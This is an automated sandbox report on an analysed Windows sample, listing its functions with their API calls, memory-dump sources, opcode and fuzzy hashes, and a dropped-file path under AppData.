              Function 00FA14F7, Relevance: 6.0, APIs: 4, Instructions: 41COMMON
              Download Yara Rule
              APIs
              • _malloc.LIBCMT ref: 00FA1511
                • Part of subcall function 00FA34DB: __FF_MSGBANNER.LIBCMT ref: 00FA34F4
                • Part of subcall function 00FA34DB: __NMSG_WRITE.LIBCMT ref: 00FA34FB
                • Part of subcall function 00FA34DB: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00FA6A35,?,00000001,?,?,00FA8179,00000018,0101D180,0000000C,00FA8209), ref: 00FA3520
              • std::exception::exception.LIBCMT ref: 00FA1546
              • std::exception::exception.LIBCMT ref: 00FA1560
              • __CxxThrowException@8.LIBCMT ref: 00FA1571
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
              • String ID:
              • API String ID: 615853336-0
              • Opcode ID: c8e612627340e056e64497049e8d319038e21644826d24af289c0b5ed9d4279c
              • Instruction ID: 0a09cdfac55644fe91e39ffce98921e7a576bc21e14a599919c9a908741d7cac
              • Opcode Fuzzy Hash: c8e612627340e056e64497049e8d319038e21644826d24af289c0b5ed9d4279c
              • Instruction Fuzzy Hash: 99F07DB1D00208AFDB30FF51DC05A9D36A9FF86310F290008F84191081CFBACF04AB91
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F490, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 86COMMON
              Download Yara Rule
              Strings
              • C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije, xrefs: 00F9F49D
              • ?T, xrefs: 00F9F522
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memset$ByteCharMultiWide$_sprintf_strlen_wcslen
              • String ID: C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije$?T
              • API String ID: 3898977315-3637181149
              • Opcode ID: a4409f720ebf0651a5b65943f30673a0adede0c972f957c1c7acf9fe56010632
              • Instruction ID: 4b884cff4e2aaceb7b28c1a0742ad8753d016e6ebf6806be07f2534a830afb57
              • Opcode Fuzzy Hash: a4409f720ebf0651a5b65943f30673a0adede0c972f957c1c7acf9fe56010632
              • Instruction Fuzzy Hash: BA21FCB2A042015BD714FF749C82A9EF398AF85310F14893AF555C3282EB7CE554A792
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F1D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 52COMMON
              Download Yara Rule
              APIs
              • _memset.LIBCMT ref: 00FB9558
              • GetOpenFileNameW.COMDLG32(?,?,?,00000001), ref: 00FB959F
                • Part of subcall function 00F9F220: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije,00F9F1F5,C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije,010390E8,C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije,?,00F9F1F5,?,?,00000001), ref: 00F9F23C
                • Part of subcall function 00F9F3B0: SHGetMalloc.SHELL32(00F9F1FC), ref: 00F9F3BD
                • Part of subcall function 00F9F3B0: SHGetDesktopFolder.SHELL32(?,010390E8), ref: 00F9F3D2
                • Part of subcall function 00F9F3B0: _wcsncpy.LIBCMT ref: 00F9F3ED
                • Part of subcall function 00F9F3B0: SHGetPathFromIDListW.SHELL32(?,?), ref: 00F9F427
                • Part of subcall function 00F9F3B0: _wcsncpy.LIBCMT ref: 00F9F440
                • Part of subcall function 00F9F290: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00F9F2AB
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen_memset
              • String ID: X
              • API String ID: 2873425188-3081909835
              • Opcode ID: b2aedd83b4063e7214dad48d1fb29b47a95b5742000cefd06c22122b6e88eb45
              • Instruction ID: d2cef8347dc660ade9efa4def7c602ea909e5cfb548b23bf28f917915a96e38d
              • Opcode Fuzzy Hash: b2aedd83b4063e7214dad48d1fb29b47a95b5742000cefd06c22122b6e88eb45
              • Instruction Fuzzy Hash: 5A11E5B0E002489BEF11DFD9DC417EEBBF9AF85304F148019E544EB245DBB9044ADBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F91D10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 00F91D11
                • Part of subcall function 00FA14F7: _malloc.LIBCMT ref: 00FA1511
              • _memmove.LIBCMT ref: 00F91D57
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1546
                • Part of subcall function 00FA14F7: std::exception::exception.LIBCMT ref: 00FA1560
                • Part of subcall function 00FA14F7: __CxxThrowException@8.LIBCMT ref: 00FA1571
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
              • String ID: @EXITCODE
              • API String ID: 2734553683-3436989551
              • Opcode ID: 2e4067a483fc2459a1b3f0e0f0c393d559d3f47989546ec9ecea7a1d84fb9087
              • Instruction ID: ebb6a6f748880ad6cb2e1b924f957266de644a05645a0f195098f2cc505f3e16
              • Opcode Fuzzy Hash: 2e4067a483fc2459a1b3f0e0f0c393d559d3f47989546ec9ecea7a1d84fb9087
              • Instruction Fuzzy Hash: BBF06DF2A406429FD754DB79CC42B6776D4AB46704F05C83DA48AC6781FA7EE442AB20
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FC297C, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
              Download Yara Rule
              APIs
              • _strlen.LIBCMT ref: 00FC2991
              • MultiByteToWideChar.KERNEL32(00000000,00000001,?,00FE4515,00000000,00000000,?,?,?,00FE4515,?,000000FF), ref: 00FC29A6
              • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00FE4515,00000000,00000000,000000FF), ref: 00FC29E5
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharMultiWide$_strlen
              • String ID:
              • API String ID: 1433632580-0
              • Opcode ID: a2617d3d66d49360babd3953c11faa837bc6549244a2b5e43a67a636ad66ee21
              • Instruction ID: a96cdde9eca32184886193d8d434932601b91abd3fcb82cc483ee150de728b30
              • Opcode Fuzzy Hash: a2617d3d66d49360babd3953c11faa837bc6549244a2b5e43a67a636ad66ee21
              • Instruction Fuzzy Hash: 8701F7377401043BD720955C9C86FABB75CDBC9B70F150129FA0CDB2C0E9B6AC0052A0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9FE20, Relevance: 4.6, APIs: 3, Instructions: 58COMMON
              Download Yara Rule
              APIs
              • _wcslen.LIBCMT ref: 00F9FE35
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00FE43ED,?,00000000,?,?), ref: 00F9FE4E
              • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 00F9FE77
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ByteCharMultiWide$_wcslen
              • String ID:
              • API String ID: 2761822629-0
              • Opcode ID: c5d829bca640d7d7104a13b8b7819e8520059ea6ebbda1fabcc2a438b3bbb778
              • Instruction ID: 0b61898b2fc1730ed5394b1a061ba3a8868ea1cff73caab0be1700b9fffaa3c7
              • Opcode Fuzzy Hash: c5d829bca640d7d7104a13b8b7819e8520059ea6ebbda1fabcc2a438b3bbb778
              • Instruction Fuzzy Hash: 0201F972F4020476F630A9B96C06F67B25CDB96F30F200275FF08E61D0E5A6AC0452A5
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9F180, Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 246COMMON
              Download Yara Rule
              APIs
              • _free.LIBCMT ref: 00FB9524
                • Part of subcall function 00F935F0: GetCurrentDirectoryW.KERNEL32(00000104,?,?), ref: 00F93681
                • Part of subcall function 00F935F0: GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00F93697
                • Part of subcall function 00F935F0: __wsplitpath.LIBCMT ref: 00F936C2
                • Part of subcall function 00F935F0: _wcscpy.LIBCMT ref: 00F936D7
                • Part of subcall function 00F935F0: _wcscat.LIBCMT ref: 00F936EC
                • Part of subcall function 00F935F0: SetCurrentDirectoryW.KERNELBASE(?), ref: 00F936FC
              Strings
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CurrentDirectory$FullNamePath__wsplitpath_free_wcscat_wcscpy
              • String ID: C:\Users\user\AppData\Roaming\98025414\ewdsxu.ije
              • API String ID: 2744521063-54651073
              • Opcode ID: 70829f0dae07fcc0c3ce1b32abd0eeb83662d7a61da741493ba25811a2ac056a
              • Instruction ID: 7b802dd4c468cdc72bdc339b1b630f03d87cc0aeb05f55f3b527f4714821062e
              • Opcode Fuzzy Hash: 70829f0dae07fcc0c3ce1b32abd0eeb83662d7a61da741493ba25811a2ac056a
              • Instruction Fuzzy Hash: E4918071D04219ABCF04EFA5CC819EE77B9FF49310F14852AE915AB341D778EA05EBA0
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F92AB0, Relevance: 3.5, APIs: 2, Instructions: 463COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: std::exception::exception$Exception@8Throw_malloc
              • String ID:
              • API String ID: 2388904642-0
              • Opcode ID: 5e7e05556aae14a9df83c34b9e149a0ae4a3ad852bcfabe3d4d34f78e5580b10
              • Instruction ID: 77718200342ff369e71aa5442ecf7ba2e4dfde0a127896393f2acb2b796a01cc
              • Opcode Fuzzy Hash: 5e7e05556aae14a9df83c34b9e149a0ae4a3ad852bcfabe3d4d34f78e5580b10
              • Instruction Fuzzy Hash: A0F1C275D04209ABEF54EF54C8819FEB3B5FF44310F254026E805A7261D739EE82EBA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9B1F0, Relevance: 3.3, APIs: 2, Instructions: 258COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: ClearVariant
              • String ID:
              • API String ID: 1473721057-0
              • Opcode ID: 475dcafafd08b46af8ea26c4fb7d1112e77f916d266620926e889a1fa40a1fcf
              • Instruction ID: f16af5a5e3ea629aeac5ee7ca8af0831876e41cb7a4691ca744c512264ccfbb7
              • Opcode Fuzzy Hash: 475dcafafd08b46af8ea26c4fb7d1112e77f916d266620926e889a1fa40a1fcf
              • Instruction Fuzzy Hash: 67918B70A00204CBEF10DF68D985EADB7F5BF4A310F28C469E8059B255E735EC41EB62
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9C440, Relevance: 3.2, APIs: 2, Instructions: 156COMMON
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
              • Instruction ID: 50d0668e06f780809482b76c73cbbf3d31d2061da3227c2ebe6a57368da6d17c
              • Opcode Fuzzy Hash: bf8650251fd6e8b3f8719f8c3f1bbd33aa13fd4ad03b92940342c50973995fb9
              • Instruction Fuzzy Hash: FE51B571A04245ABEF14DF69CC85EFAB3B9AF44300F148059FA1997252D778ED80DB90
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FF6C11, Relevance: 3.1, APIs: 2, Instructions: 130COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _memmove
              • String ID:
              • API String ID: 4104443479-0
              • Opcode ID: 8e9bf8fb4d28cf2e382f6d8bb2f4223d7ab8bca57c4ba5d7b2b796ff05e21dc5
              • Instruction ID: 4c14ee349e29c5ecb99217b27162a3ad9093f3f5271af67a1681cd99b9f60946
              • Opcode Fuzzy Hash: 8e9bf8fb4d28cf2e382f6d8bb2f4223d7ab8bca57c4ba5d7b2b796ff05e21dc5
              • Instruction Fuzzy Hash: CD41D6B6D00144ABDB10EF54CC81FBE7B74EF4A300F158058FA899B352DA39A946E7A1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9D8B0, Relevance: 3.1, APIs: 2, Instructions: 74COMMON
              Download Yara Rule
              APIs
              • SystemParametersInfoW.USER32 ref: 00F9D979
              • FreeLibrary.KERNEL32(?), ref: 00F9D98E
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FreeInfoLibraryParametersSystem
              • String ID:
              • API String ID: 3403648963-0
              • Opcode ID: 92f1b9cd1a2d8183084b2272c4ad136643067906ce22b2f5af9c9c371df1fcd2
              • Instruction ID: 5bcb4d583f15388ed32a80f0f3e2fe5c543d9abed08f7f5bd1d9995e98ebfecd
              • Opcode Fuzzy Hash: 92f1b9cd1a2d8183084b2272c4ad136643067906ce22b2f5af9c9c371df1fcd2
              • Instruction Fuzzy Hash: 6921ADB19083009FD720EF19DC8190ABBE8FB88318F50492DF98893356D77AD945DB92
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F93C80, Relevance: 3.1, APIs: 2, Instructions: 56COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: _malloc_wcscpy_wcslen
              • String ID:
              • API String ID: 245337311-0
              • Opcode ID: 839ce3b9871463a79a2e26b09c2989007b6dead2256b9e669ac5c72187e70755
              • Instruction ID: 5886c57b44ab5fe0519ce4427f42cf3625ee09449fd22fc9118c082f1b92288a
              • Opcode Fuzzy Hash: 839ce3b9871463a79a2e26b09c2989007b6dead2256b9e669ac5c72187e70755
              • Instruction Fuzzy Hash: B9116DB05006409FD754DF59C842E26F7E4FF46310F04C82EE89A8B791D639E841DF51
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA07A0, Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
              Download Yara Rule
              APIs
              • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00F9E094,?,00000001,?,00F93653,?), ref: 00FA07CA
              • CreateFileW.KERNELBASE(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00F9E094,?,00000001,?,00F93653,?), ref: 00FB6296
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: CreateFile
              • String ID:
              • API String ID: 823142352-0
              • Opcode ID: 5dcb294a6b29194fa874adc57f78be19b2bb8d6dacfc2f816b15be50b76700ff
              • Instruction ID: c983e21241fd16a80a352af5ada50410da082c8b04a8edcc95bc8669de9700a4
              • Opcode Fuzzy Hash: 5dcb294a6b29194fa874adc57f78be19b2bb8d6dacfc2f816b15be50b76700ff
              • Instruction Fuzzy Hash: 26013C70784700BAF6755A28AC5BF513690AB06B34F344714B7E5FF1D1D6F878829B44
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F916A0, Relevance: 3.0, APIs: 2, Instructions: 50COMMON
              Download Yara Rule
              APIs
              • GetFullPathNameW.KERNEL32(?,00000104,?,?), ref: 00F916E5
                • Part of subcall function 00F92390: _wcslen.LIBCMT ref: 00F9239D
                • Part of subcall function 00F92390: _memmove.LIBCMT ref: 00F923C3
              • _wcscat.LIBCMT ref: 00FB8BC8
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: FullNamePath_memmove_wcscat_wcslen
              • String ID:
              • API String ID: 189345764-0
              • Opcode ID: 17f81d237300d9c2af2c2d20111b9e83abcc8632a06ec13c97bded0a2d2eaf5a
              • Instruction ID: 879ce8aa281dfeb81f8464c6ec6b96d469fbd009c87752cbd7c2c0c8b41b21ca
              • Opcode Fuzzy Hash: 17f81d237300d9c2af2c2d20111b9e83abcc8632a06ec13c97bded0a2d2eaf5a
              • Instruction Fuzzy Hash: 4001047894020DA7EF10EBB1CC81ADE737CFF95300F0085D5B94497201EA398A85ABA1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA4B96, Relevance: 3.0, APIs: 2, Instructions: 40COMMON
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __lock_file_memset
              • String ID:
              • API String ID: 26237723-0
              • Opcode ID: d042c6e10b5cb12a45a65b3d5aff4cff15dc3e0de0bb9bf9f3fac9190f6dab9e
              • Instruction ID: b4fa1edbe6cfb877c70d285e9daf78a9aa261f034763e941374172c746d7156d
              • Opcode Fuzzy Hash: d042c6e10b5cb12a45a65b3d5aff4cff15dc3e0de0bb9bf9f3fac9190f6dab9e
              • Instruction Fuzzy Hash: 640171B2C00219EBCF11AFA4CC4299E7B31BF867A0F008155F82455051D3B98A72FFE1
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00FA4966, Relevance: 3.0, APIs: 2, Instructions: 32COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 00FA7E9A: __getptd_noexit.LIBCMT ref: 00FA7E9A
              • __lock_file.LIBCMT ref: 00FA49AD
                • Part of subcall function 00FA5391: __lock.LIBCMT ref: 00FA53B6
              • __fclose_nolock.LIBCMT ref: 00FA49B8
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394918477.0000000001020000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394935971.0000000001021000.00000008.00020000.sdmp Download File
              • Associated: 00000004.00000002.394948655.0000000001022000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394965694.0000000001037000.00000004.00020000.sdmp Download File
              • Associated: 00000004.00000002.394977155.000000000103B000.00000002.00020000.sdmp Download File
              Similarity
              • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
              • String ID:
              • API String ID: 2800547568-0
              • Opcode ID: d02a38ac0967ffe5cbdb8252c39894c5f0a63bed0336bed6edf6d804b3cb9c84
              • Instruction ID: 82e8b661dc1d6e45eda29026521b3cb667e59c432ede5d97a7c29119f54559c7
              • Opcode Fuzzy Hash: d02a38ac0967ffe5cbdb8252c39894c5f0a63bed0336bed6edf6d804b3cb9c84
              • Instruction Fuzzy Hash: C8F02BF2810701DADB10BBB48C02B5F77A06F47330F108218E070DA0D1C7BC6912BB66
              Uniqueness

              Uniqueness Score: -1.00%

              Function 00F9D5C0, Relevance: 3.0, APIs: 2, Instructions: 29sleeptimeCOMMON
              Download Yara Rule
              APIs
              • timeGetTime.WINMM ref: 00F9D5DC
                • Part of subcall function 00F99430: PeekMessageW.USER32 ref: 00F994B6
              • Sleep.KERNEL32(00000000), ref: 00FBE125
              Memory Dump Source
              • Source File: 00000004.00000002.394808921.0000000000F91000.00000020.00020000.sdmp, Offset: 00F90000, based on PE: true
              • Associated: 00000004.00000002.394801893.0000000000F90000.00000002.00020000.sdmp Download File
              • Associated: 00000004.00000002.394898675.0000000001012000.00000002.00020000.sdmp Download File
